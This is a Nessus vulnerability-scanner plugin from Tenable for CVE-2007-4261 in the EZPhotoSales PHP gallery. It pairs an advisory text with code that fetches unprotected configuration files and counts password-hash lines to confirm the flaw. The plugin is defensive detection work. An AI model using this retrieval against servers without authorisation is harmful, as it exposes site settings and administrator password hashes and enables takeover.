#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains a PHP application that is affected by
information disclosure vulnerabilities. 

Description :

The remote host is running EZPhotoSales, a web-based photo gallery
application for photographers written in PHP. 

The version of EZPhotoSales installed on the remote host fails to
restrict access to configuration files used by the application.  An
unauthenticated remote attacker can leverage this issue to obtain
sensitive information about the affected application, possibly
enabling him to gain administrative control, which in turn could lead
to arbitrary code execution on the affected host, cross-site scripting
attacks against visitors, and the like. 

See also :

http://www.airscanner.com/security/07080601_ezphotosales.htm
http://www.securityfocus.com/archive/1/archive/1/475678/100/0/threaded
http://www.ezphotosales.com/patch.htm

Solution :

Either upgrade to EZPhotoSales 1.9.4 or later, apply the vendor's patch,
or limit access to the application's configuration files using, say, a
.htaccess file. 

Risk factor : 

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(25899);
  script_version("$Revision: 1.5 $");

  script_cve_id("CVE-2007-4261");
  script_bugtraq_id(25323);
  script_xref(name:"OSVDB", value:"39537");

  script_name(english:"EZPhotoSales Information Disclosure Vulnerabilities");
  script_summary(english:"Tries to retrieve config files");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/EZPhotoSales", "/OnlineViewing", "/onlineviewing", "/Gallery", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to exploit the issue to retrieve one of the config files.
  if (thorough_tests) files = make_list("configuration/galleryConfig.txt", "configuration/config.dat");
  else files = make_list("configuration/galleryConfig.txt");

  foreach file (files)
  {
    req = http_get(item:string(dir, "/", file), port:port);
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    hash_lines = 0;
    if (file == 'configuration/config.dat')
    {
      foreach line (split(res, keep:FALSE))
        if (line =~ "^\$1\$[^ ]{32}$") hash_lines++;
    }

    # If...
    if (
      (file == 'configuration/galleryConfig.txt' && 'WebPageTitle: ' >< res) ||
      (file == 'configuration/config.dat' && hash_lines == 2)
    )
    {
      report = string(
        desc,
        "\n\n",
        "Plugin output :\n",
        "\n",
        "Nessus was able to exploit the issue to obtain the following copy of\n",
        "the application's '", file, "' file from the\n",
        "remote host :\n",
        "\n",
        res
      );
      security_hole(port:port, data:report);
      exit(0);
    }
  }
}
